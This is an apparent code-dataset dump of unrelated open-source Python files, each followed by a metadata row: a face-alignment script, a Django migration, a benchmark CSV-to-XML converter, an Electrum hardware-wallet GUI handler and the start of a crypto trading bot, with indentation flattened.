obj.name.lstrip("/").lstrip(f"{NAME_COLLISIONS_DIR_NAME}/")
for obj in storage.list_objects("")
]
assert "file.txt" not in remaining_object_names
assert "file.txt.collision" in remaining_object_names
assert "dir_name/file.txt" in remaining_object_names
# TODO or not TODO: many cases are missing - checking names, testing overwriting.
| 33.601852 | 111 | 0.74194 | [
"MIT"
] | AnesBenmerzoug/accsr | tests/accsr/test_remote_storage.py | 7,258 | Python |
"""Performs face alignment and stores face thumbnails in the output directory."""
# MIT License
#
# Copyright (c) 2016 David Sandberg
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from scipy import misc
import sys
import os
import argparse
import tensorflow as tf
import numpy as np
import facenet
from detect_face import create_mtcnn, detect_face
import random
from time import sleep
def main(args):
sleep(random.random())
output_dir = os.path.expanduser(args.output_dir)
if not os.path.exists(output_dir):
os.makedirs(output_dir)
# Store some git revision info in a text file in the log directory
src_path,_ = os.path.split(os.path.realpath(__file__))
facenet.store_revision_info(src_path, output_dir, ' '.join(sys.argv))
dataset = facenet.get_dataset(args.input_dir, False)
print('Creating networks and loading parameters')
with tf.Graph().as_default():
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=args.gpu_memory_fraction)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
pnet, rnet, onet = create_mtcnn(sess, None)
minsize = 20 # minimum size of face
    threshold = [ 0.6, 0.7, 0.7 ]  # three steps' threshold
factor = 0.709 # scale factor
# Add a random key to the filename to allow alignment using multiple processes
random_key = np.random.randint(0, high=99999)
bounding_boxes_filename = os.path.join(output_dir, 'bounding_boxes_%05d.txt' % random_key)
with open(bounding_boxes_filename, "w") as text_file:
nrof_images_total = 0
nrof_successfully_aligned = 0
if args.random_order:
random.shuffle(dataset)
for cls in dataset:
output_class_dir = os.path.join(output_dir, cls.name)
if not os.path.exists(output_class_dir):
os.makedirs(output_class_dir)
if args.random_order:
random.shuffle(cls.image_paths)
for image_path in cls.image_paths:
nrof_images_total += 1
filename = os.path.splitext(os.path.split(image_path)[1])[0]
output_filename = os.path.join(output_class_dir, filename+'.png')
print(image_path)
if not os.path.exists(output_filename):
try:
img = misc.imread(image_path)
except (IOError, ValueError, IndexError) as e:
errorMessage = '{}: {}'.format(image_path, e)
print(errorMessage)
else:
if img.ndim<2:
print('Unable to align "%s"' % image_path)
text_file.write('%s\n' % (output_filename))
continue
if img.ndim == 2:
img = facenet.to_rgb(img)
img = img[:,:,0:3]
bounding_boxes, _ = detect_face(img, minsize, pnet, rnet, onet, threshold, factor)
nrof_faces = bounding_boxes.shape[0]
if nrof_faces>0:
det = bounding_boxes[:,0:4]
det_arr = []
img_size = np.asarray(img.shape)[0:2]
if nrof_faces>1:
if args.detect_multiple_faces:
for i in range(nrof_faces):
det_arr.append(np.squeeze(det[i]))
else:
bounding_box_size = (det[:,2]-det[:,0])*(det[:,3]-det[:,1])
img_center = img_size / 2
offsets = np.vstack([ (det[:,0]+det[:,2])/2-img_center[1], (det[:,1]+det[:,3])/2-img_center[0] ])
offset_dist_squared = np.sum(np.power(offsets,2.0),0)
index = np.argmax(bounding_box_size-offset_dist_squared*2.0) # some extra weight on the centering
det_arr.append(det[index,:])
else:
det_arr.append(np.squeeze(det))
for i, det in enumerate(det_arr):
det = np.squeeze(det)
bb = np.zeros(4, dtype=np.int32)
bb[0] = np.maximum(det[0]-args.margin/2, 0)
bb[1] = np.maximum(det[1]-args.margin/2, 0)
bb[2] = np.minimum(det[2]+args.margin/2, img_size[1])
bb[3] = np.minimum(det[3]+args.margin/2, img_size[0])
cropped = img[bb[1]:bb[3],bb[0]:bb[2],:]
scaled = misc.imresize(cropped, (args.image_size, args.image_size), interp='bilinear')
nrof_successfully_aligned += 1
filename_base, file_extension = os.path.splitext(output_filename)
if args.detect_multiple_faces:
output_filename_n = "{}_{}{}".format(filename_base, i, file_extension)
else:
output_filename_n = "{}{}".format(filename_base, file_extension)
misc.imsave(output_filename_n, scaled)
text_file.write('%s %d %d %d %d\n' % (output_filename_n, bb[0], bb[1], bb[2], bb[3]))
else:
print('Unable to align "%s"' % image_path)
text_file.write('%s\n' % (output_filename))
print('Total number of images: %d' % nrof_images_total)
print('Number of successfully aligned images: %d' % nrof_successfully_aligned)
def parse_arguments(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--input_dir', type=str, help='Directory with unaligned images.')
parser.add_argument('--output_dir', type=str, help='Directory with aligned face thumbnails.')
parser.add_argument('--image_size', type=int,
help='Image size (height, width) in pixels.', default=182)
parser.add_argument('--margin', type=int,
help='Margin for the crop around the bounding box (height, width) in pixels.', default=44)
parser.add_argument('--random_order',
help='Shuffles the order of images to enable alignment using multiple processes.', action='store_true')
parser.add_argument('--gpu_memory_fraction', type=float,
help='Upper bound on the amount of GPU memory that will be used by the process.', default=1.0)
parser.add_argument('--detect_multiple_faces', type=bool,
help='Detect and align multiple faces per image.', default=False)
return parser.parse_args(argv)
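# Example invocation (illustrative only; the dataset paths are hypothetical):
#
#   python align_dataset_mtcnn.py --input_dir ~/datasets/faces_raw \
#       --output_dir ~/datasets/faces_aligned --image_size 182 --margin 44 --random_order
#
# Several such processes can be started on the same dataset thanks to --random_order and
# the random key in the bounding-boxes filename. Note that --detect_multiple_faces is
# declared with type=bool, so argparse treats any non-empty value (including "False") as
# True; omit the flag entirely to keep single-face behaviour.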
if __name__ == '__main__':
main(parse_arguments(sys.argv[1:]))
| 51.8875 | 133 | 0.57456 | ["MIT"] | btlk/facenet | facenet/align/align_dataset_mtcnn.py | 8,302 | Python
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'MessageContact'
db.create_table('umessages_messagecontact', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('from_user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='from_users', to=orm['auth.User'])),
('to_user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='to_users', to=orm['auth.User'])),
('latest_message', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['umessages.Message'])),
))
db.send_create_signal('umessages', ['MessageContact'])
# Adding unique constraint on 'MessageContact', fields ['from_user', 'to_user']
db.create_unique('umessages_messagecontact', ['from_user_id', 'to_user_id'])
# Adding model 'MessageRecipient'
db.create_table('umessages_messagerecipient', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
('message', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['umessages.Message'])),
('read_at', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
('deleted_at', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal('umessages', ['MessageRecipient'])
# Adding model 'Message'
db.create_table('umessages_message', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('body', self.gf('django.db.models.fields.TextField')()),
('sender', self.gf('django.db.models.fields.related.ForeignKey')(related_name='sent_messages', to=orm['auth.User'])),
('sent_at', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('sender_deleted_at', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal('umessages', ['Message'])
def backwards(self, orm):
# Removing unique constraint on 'MessageContact', fields ['from_user', 'to_user']
db.delete_unique('umessages_messagecontact', ['from_user_id', 'to_user_id'])
# Deleting model 'MessageContact'
db.delete_table('umessages_messagecontact')
# Deleting model 'MessageRecipient'
db.delete_table('umessages_messagerecipient')
# Deleting model 'Message'
db.delete_table('umessages_message')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'umessages.message': {
'Meta': {'ordering': "['-sent_at']", 'object_name': 'Message'},
'body': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'recipients': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'received_messages'", 'symmetrical': 'False', 'through': "orm['umessages.MessageRecipient']", 'to': "orm['auth.User']"}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sent_messages'", 'to': "orm['auth.User']"}),
'sender_deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'sent_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
'umessages.messagecontact': {
'Meta': {'ordering': "['latest_message']", 'unique_together': "(('from_user', 'to_user'),)", 'object_name': 'MessageContact'},
'from_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'from_users'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'latest_message': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['umessages.Message']"}),
'to_user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'to_users'", 'to': "orm['auth.User']"})
},
'umessages.messagerecipient': {
'Meta': {'object_name': 'MessageRecipient'},
'deleted_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['umessages.Message']"}),
'read_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['umessages']
| 65.691057 | 221 | 0.593936 | ["BSD-3-Clause"] | SkyTruth/django-userena | userena/contrib/umessages/migrations/0001_initial.py | 8,080 | Python
#!/bin/env python
import csv
from datetime import datetime
import os
import xml.etree.ElementTree as ET
import xml
# https://stackabuse.com/reading-and-writing-xml-files-in-python/
# xmlformatter:
# https://www.freeformatter.com/xml-formatter.html#ad-output
infile = "./RAJAPerf-timing.csv"
def read_infile(infile):
"""STUB"""
with open(infile) as csvfile:
rps_reader = csv.reader(csvfile, delimiter=',')
def get_date():
"""STUB"""
date = datetime.now().strftime("%-Y-%m-%dT%H:%M:%S")
return date
date = get_date()
perf_report = ET.Element("performance-report")
name ="RAJAPerf" + date + ".xml"
time_units="seconds"
perf_report.set("date", date)
perf_report.set("name", name)
perf_report.set("time-units", time_units)
perf_root = ET.SubElement(perf_report, 'timing')
perf_root.set("end-time",date)
perf_root.set("name", "kokkos_perf_suite")
#print(ET.tostring(perf_report))
# b'<performance-report time-units="seconds" date="2020-12-16T14:34:40"
# name="RAJAPerf-timing.csv"><timing end-time="2020-12-16T14:34:40"
# name="kokkos_perf_suite" /></performance-report>'
# metadata TBD
# create hierarchy
test_suite_list = []
with open(infile) as csvfile:
rps_reader = csv.reader(csvfile, delimiter=',')
for row in rps_reader:
test_suite_list.append(row)
suite_names_set = set([x[0][:x[0].find("_")] for x in test_suite_list[2:]])
#suite_names_set
#Out[135]: {'Basic', 'KokkosMechanics'}
heirarch_dict = dict()
for name in suite_names_set:
heirarch_dict[name] = []
# heirarch_dict
# Out[137]: {'KokkosMechanics': [], 'Basic': []}
for item in test_suite_list[2:]:
key = item[0][:item[0].find("_")]
heirarch_dict[key].append(item)
#print(item)
#NEXT STEPS: For the main test categories, Basic and KokkosMechanics, sum
# the test times over all of the kernels for each of their variants
col_meanings_dict = dict()
for index, item in enumerate(test_suite_list[1]):
#print(index, item)
col_meanings_dict[index] = item
#col_meanings_dict
# Out[152]:
# {0: 'Kernel ',
# 1: ' Base_Seq ',
# 2: ' Lambda_Seq ',
# 3: ' RAJA_Seq ',
# 4: ' Base_CUDA ',
# 5: ' RAJA_CUDA ',
# 6: ' Kokkos_Lambda_Seq ',
# 7: ' Kokkos_Functor_Seq ',
# 8: ' Kokkos_Lambda_CUDA ',
# 9: ' Kokkos_Functor_CUDA'}
def associate_timings_with_xml(xml_element, timing_dict, suite_or_test_name):
"""STUB -- xml_element will be an element of perf_report;
timing_dict = a map of variant names to test run times
"""
for key, value in timing_dict.items():
xml_element.set(key.lower(), str(value))
xml_element.set("name", suite_or_test_name.strip())
def create_RPS_xml_report(suite_name, suite_data_list):
"""STUB - suite_name is a string = Basic, KokkosMechanics, etc.;
suite_data_list will be the values for a key, Basic or KokkosMechanics
"""
aggregate_results_dict = dict()
#print(suite_data_list)
for list_item in suite_data_list:
for index, timing in enumerate(list_item[1:]):
if "Not run" in timing:
continue
variant_name = col_meanings_dict[index + 1]
if variant_name not in aggregate_results_dict:
aggregate_results_dict[variant_name] = 0.0
# sums values of all the basic kernels
aggregate_results_dict[variant_name] += float(timing)
#print(aggregate_results_dict)
suite_root = ET.SubElement(perf_root, "timing")
associate_timings_with_xml(suite_root, aggregate_results_dict, suite_name)
for list_item in suite_data_list:
test_timings_dict = dict()
for index, timing in enumerate(list_item[1:]):
if "Not run" in timing:
continue
variant_name = col_meanings_dict[index + 1]
test_timings_dict[variant_name] = float(timing)
xml_element_for_a_kernel_test = ET.SubElement(suite_root, "timing")
associate_timings_with_xml(xml_element_for_a_kernel_test,
test_timings_dict, list_item[0])
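# Illustrative shape of the output (kernel names and numbers are made up): for a suite
# such as "Basic" the subtree built above looks roughly like
#
#   <timing name="Basic" base_seq="12.34" kokkos_lambda_seq="11.90" ...>
#     <timing name="Basic_DAXPY" base_seq="1.23" kokkos_lambda_seq="1.19" ... />
#     ...
#   </timing>
#
# where the attributes are the lower-cased CSV variant headers and the suite-level values
# are the sums of the per-kernel timings.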
def run():
"""STUB"""
read_infile(infile)
#create_RPS_xml_report("Basic", heirarch_dict["Basic"])
for key in heirarch_dict.keys():
create_RPS_xml_report(key, heirarch_dict[key])
# Aided in debugging
#print(heirarch_dict["KokkosMechanics"])
# Prints xml to screen as string
#print(ET.tostring(perf_report))
ET.dump(perf_report)
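# Optional helper sketch (not called anywhere above; the default output path is an
# assumption): write the report to a file with indentation instead of dumping it to
# stdout, using only the standard library.
def write_pretty_xml(element, path="./RAJAPerf-timing.xml"):
    """Pretty-print an ElementTree element to a file."""
    import xml.dom.minidom as minidom
    pretty = minidom.parseString(ET.tostring(element)).toprettyxml(indent="  ")
    with open(path, "w") as handle:
        handle.write(pretty)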
if __name__ == "__main__":
run()
| 25.563218 | 78 | 0.678507 | ["BSD-3-Clause"] | CRobeck/RAJAPerf | scripts/csv_xml.py | 4,448 | Python
#!/usr/bin/env python2
# -*- mode: python -*-
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2016 The Electrum developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
from PyQt5.QtWidgets import QVBoxLayout, QLabel
from qtum_electrum.gui.qt.password_dialog import PasswordLayout, PW_PASSPHRASE
from qtum_electrum.gui.qt.util import *
from qtum_electrum.i18n import _
from qtum_electrum.util import PrintError
# The trickiest thing about this handler was getting windows properly
# parented on MacOSX.
class QtHandlerBase(QObject, PrintError):
'''An interface between the GUI (here, QT) and the device handling
logic for handling I/O.'''
passphrase_signal = pyqtSignal(object, object)
message_signal = pyqtSignal(object, object)
error_signal = pyqtSignal(object, object)
word_signal = pyqtSignal(object)
clear_signal = pyqtSignal()
query_signal = pyqtSignal(object, object)
yes_no_signal = pyqtSignal(object)
status_signal = pyqtSignal(object)
def __init__(self, win, device):
super(QtHandlerBase, self).__init__()
self.clear_signal.connect(self.clear_dialog)
self.error_signal.connect(self.error_dialog)
self.message_signal.connect(self.message_dialog)
self.passphrase_signal.connect(self.passphrase_dialog)
self.word_signal.connect(self.word_dialog)
self.query_signal.connect(self.win_query_choice)
self.yes_no_signal.connect(self.win_yes_no_question)
self.status_signal.connect(self._update_status)
self.win = win
self.device = device
self.dialog = None
self.done = threading.Event()
def top_level_window(self):
return self.win.top_level_window()
def update_status(self, paired):
self.status_signal.emit(paired)
def _update_status(self, paired):
if hasattr(self, 'button'):
button = self.button
icon_name = button.icon_paired if paired else button.icon_unpaired
button.setIcon(read_QIcon(icon_name))
def query_choice(self, msg, labels):
self.done.clear()
self.query_signal.emit(msg, labels)
self.done.wait()
return self.choice
def yes_no_question(self, msg):
self.done.clear()
self.yes_no_signal.emit(msg)
self.done.wait()
return self.ok
def show_message(self, msg, on_cancel=None):
self.message_signal.emit(msg, on_cancel)
def show_error(self, msg, blocking=False):
self.done.clear()
self.error_signal.emit(msg, blocking)
if blocking:
self.done.wait()
def finished(self):
self.clear_signal.emit()
def get_word(self, msg):
self.done.clear()
self.word_signal.emit(msg)
self.done.wait()
return self.word
def get_passphrase(self, msg, confirm):
self.done.clear()
self.passphrase_signal.emit(msg, confirm)
self.done.wait()
return self.passphrase
def passphrase_dialog(self, msg, confirm):
# If confirm is true, require the user to enter the passphrase twice
parent = self.top_level_window()
d = WindowModalDialog(parent, _("Enter Passphrase"))
if confirm:
OK_button = OkButton(d)
playout = PasswordLayout(msg=msg, kind=PW_PASSPHRASE, OK_button=OK_button)
vbox = QVBoxLayout()
vbox.addLayout(playout.layout())
vbox.addLayout(Buttons(CancelButton(d), OK_button))
d.setLayout(vbox)
passphrase = playout.new_password() if d.exec_() else None
else:
pw = QLineEdit()
            pw.setEchoMode(2)  # 2 == QLineEdit.Password
pw.setMinimumWidth(200)
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(msg))
vbox.addWidget(pw)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
d.setLayout(vbox)
passphrase = pw.text() if d.exec_() else None
self.passphrase = passphrase
self.done.set()
def word_dialog(self, msg):
dialog = WindowModalDialog(self.top_level_window(), "")
hbox = QHBoxLayout(dialog)
hbox.addWidget(QLabel(msg))
text = QLineEdit()
text.setMaximumWidth(100)
text.returnPressed.connect(dialog.accept)
hbox.addWidget(text)
hbox.addStretch(1)
dialog.exec_() # Firmware cannot handle cancellation
self.word = text.text()
self.done.set()
def message_dialog(self, msg, on_cancel):
# Called more than once during signing, to confirm output and fee
self.clear_dialog()
title = _('Please check your %s device') % self.device
self.dialog = dialog = WindowModalDialog(self.top_level_window(), title)
l = QLabel(msg)
vbox = QVBoxLayout(dialog)
vbox.addWidget(l)
if on_cancel:
dialog.rejected.connect(on_cancel)
vbox.addLayout(Buttons(CancelButton(dialog)))
dialog.show()
def error_dialog(self, msg, blocking):
self.win.show_error(msg, parent=self.top_level_window())
if blocking:
self.done.set()
def clear_dialog(self):
if self.dialog:
self.dialog.accept()
self.dialog = None
def win_query_choice(self, msg, labels):
self.choice = self.win.query_choice(msg, labels)
self.done.set()
def win_yes_no_question(self, msg):
self.ok = self.win.question(msg)
self.done.set()
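# Minimal usage sketch (hypothetical plugin code, not part of this module): a hardware
# wallet worker thread drives the user interaction through the handler; each call emits
# a Qt signal so the dialog runs on the GUI thread, while the threading.Event blocks the
# worker until the user has answered.
#
#   def confirm_and_sign(handler, sign_func):
#       if not handler.yes_no_question(_("Sign this transaction?")):
#           return None
#       handler.show_message(_("Confirm the action on your device..."))
#       try:
#           return sign_func()
#       finally:
#           handler.finished()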
from qtum_electrum.plugin import hook
from qtum_electrum.util import UserCancelled
from qtum_electrum.gui.qt.main_window import StatusBarButton
class QtPluginBase(object):
@hook
def load_wallet(self, wallet, window):
for keystore in wallet.get_keystores():
if not isinstance(keystore, self.keystore_class):
continue
if not self.libraries_available:
message = keystore.plugin.get_library_not_available_message()
window.show_error(message)
return
tooltip = self.device + '\n' + (keystore.label or 'unnamed')
cb = partial(self.show_settings_dialog, window, keystore)
button = StatusBarButton(QIcon(self.icon_unpaired), tooltip, cb)
button.icon_paired = self.icon_paired
button.icon_unpaired = self.icon_unpaired
window.statusBar().addPermanentWidget(button)
handler = self.create_handler(window)
handler.button = button
keystore.handler = handler
keystore.thread = TaskThread(window, window.on_error)
self.add_show_address_on_hw_device_button_for_receive_addr(wallet, keystore, window)
# Trigger a pairing
keystore.thread.add(partial(self.get_client, keystore))
def choose_device(self, window, keystore):
'''This dialog box should be usable even if the user has
forgotten their PIN or it is in bootloader mode.'''
device_id = self.device_manager().xpub_id(keystore.xpub)
if not device_id:
try:
info = self.device_manager().select_device(self, keystore.handler, keystore)
except UserCancelled:
return
device_id = info.device.id_
return device_id
def show_settings_dialog(self, window, keystore):
device_id = self.choose_device(window, keystore)
def add_show_address_on_hw_device_button_for_receive_addr(self, wallet, keystore, main_window):
plugin = keystore.plugin
receive_address_e = main_window.receive_address_e
def show_address():
addr = receive_address_e.text()
keystore.thread.add(partial(plugin.show_address, wallet, addr, keystore))
receive_address_e.addButton("eye1.png", show_address, _("Show on {}").format(plugin.device))
| 37.90678 | 100 | 0.666331 | ["MIT"] | mikehash/qtum-electrum | qtum_electrum/plugins/hw_wallet/qt.py | 8,946 | Python
"""Python Crypto Bot consuming Coinbase Pro or Binance APIs"""
import functools
import os
import sched
import sys
import time
import pandas as pd
from datetime import datetime
from models.PyCryptoBot import PyCryptoBot, truncate as _truncate
from models.AppState import AppState
from models.Trading import TechnicalAnalysis
from models.TradingAccount import TradingAccount
from models.helper.MarginHelper import calculate_margin
from views.TradingGraphs import TradingGraphs
from models.Strategy import Strategy
from models.helper.LogHelper import Logger
# minimal traceback
sys.tracebacklimit = 1
app = PyCryptoBot()
account = TradingAccount(app)
technical_analysis = None
state = AppState(app, account)
state.initLastAction()
s = sched.scheduler(time.time, time.sleep)
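# The bot is driven by this single sched-based polling loop: executeJob() below always
# clears anything still queued and re-enters itself, so at most one run is pending at a
# time: every 60 seconds in normal operation, every 5 minutes after a connectivity
# failure, a few seconds after a granularity smart switch, and back-to-back when
# simulating at 'fast' speed.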
def executeJob(sc=None, app: PyCryptoBot=None, state: AppState=None, trading_data=pd.DataFrame()):
"""Trading bot job which runs at a scheduled interval"""
global technical_analysis
# connectivity check (only when running live)
if app.isLive() and app.getTime() is None:
        Logger.warning('Your connection to the exchange has gone down, will retry in 5 minutes!')
        # poll every 5 minutes
list(map(s.cancel, s.queue))
s.enter(300, 1, executeJob, (sc, app, state))
return
# increment state.iterations
state.iterations = state.iterations + 1
if not app.isSimulation():
# retrieve the app.getMarket() data
trading_data = app.getHistoricalData(app.getMarket(), app.getGranularity())
else:
if len(trading_data) == 0:
return None
# analyse the market data
if app.isSimulation() and len(trading_data.columns) > 8:
df = trading_data
else:
trading_dataCopy = trading_data.copy()
technical_analysis = TechnicalAnalysis(trading_dataCopy)
technical_analysis.addAll()
df = technical_analysis.getDataFrame()
if app.isSimulation():
df_last = app.getInterval(df, state.iterations)
else:
df_last = app.getInterval(df)
if len(df_last.index.format()) > 0:
current_df_index = str(df_last.index.format()[0])
else:
current_df_index = state.last_df_index
formatted_current_df_index = f'{current_df_index} 00:00:00' if len(current_df_index) == 10 else current_df_index
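    # smart switch between granularities: on hourly candles drop to 15 minutes when both
    # the 1h and 6h EMA12/26 are bullish, and return to hourly when both are bearish; the
    # job re-enters itself after 5 seconds so the new granularity takes effect straight away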
if app.getSmartSwitch() == 1 and app.getGranularity() == 3600 and app.is1hEMA1226Bull() is True and app.is6hEMA1226Bull() is True:
Logger.info('*** smart switch from granularity 3600 (1 hour) to 900 (15 min) ***')
app.notifyTelegram(app.getMarket() + " smart switch from granularity 3600 (1 hour) to 900 (15 min)")
app.setGranularity(900)
list(map(s.cancel, s.queue))
s.enter(5, 1, executeJob, (sc, app, state))
if app.getSmartSwitch() == 1 and app.getGranularity() == 900 and app.is1hEMA1226Bull() is False and app.is6hEMA1226Bull() is False:
Logger.info("*** smart switch from granularity 900 (15 min) to 3600 (1 hour) ***")
app.notifyTelegram(app.getMarket() + " smart switch from granularity 900 (15 min) to 3600 (1 hour)")
app.setGranularity(3600)
list(map(s.cancel, s.queue))
s.enter(5, 1, executeJob, (sc, app, state))
if app.getExchange() == 'binance' and app.getGranularity() == 86400:
if len(df) < 250:
# data frame should have 250 rows, if not retry
Logger.error('error: data frame length is < 250 (' + str(len(df)) + ')')
list(map(s.cancel, s.queue))
s.enter(300, 1, executeJob, (sc, app, state))
else:
if len(df) < 300:
if not app.isSimulation():
# data frame should have 300 rows, if not retry
Logger.error('error: data frame length is < 300 (' + str(len(df)) + ')')
list(map(s.cancel, s.queue))
s.enter(300, 1, executeJob, (sc, app, state))
if len(df_last) > 0:
now = datetime.today().strftime('%Y-%m-%d %H:%M:%S')
if not app.isSimulation():
ticker = app.getTicker(app.getMarket())
now = ticker[0]
price = ticker[1]
if price < df_last['low'].values[0] or price == 0:
price = float(df_last['close'].values[0])
else:
price = float(df_last['close'].values[0])
if price < 0.0001:
raise Exception(app.getMarket() + ' is unsuitable for trading, quote price is less than 0.0001!')
# technical indicators
ema12gtema26 = bool(df_last['ema12gtema26'].values[0])
ema12gtema26co = bool(df_last['ema12gtema26co'].values[0])
goldencross = bool(df_last['goldencross'].values[0])
macdgtsignal = bool(df_last['macdgtsignal'].values[0])
macdgtsignalco = bool(df_last['macdgtsignalco'].values[0])
ema12ltema26 = bool(df_last['ema12ltema26'].values[0])
ema12ltema26co = bool(df_last['ema12ltema26co'].values[0])
macdltsignal = bool(df_last['macdltsignal'].values[0])
macdltsignalco = bool(df_last['macdltsignalco'].values[0])
obv = float(df_last['obv'].values[0])
obv_pc = float(df_last['obv_pc'].values[0])
elder_ray_buy = bool(df_last['eri_buy'].values[0])
elder_ray_sell = bool(df_last['eri_sell'].values[0])
        # if simulation iterations < 200, set goldencross to true
if app.isSimulation() and state.iterations < 200:
goldencross = True
# candlestick detection
hammer = bool(df_last['hammer'].values[0])
inverted_hammer = bool(df_last['inverted_hammer'].values[0])
hanging_man = bool(df_last['hanging_man'].values[0])
shooting_star = bool(df_last['shooting_star'].values[0])
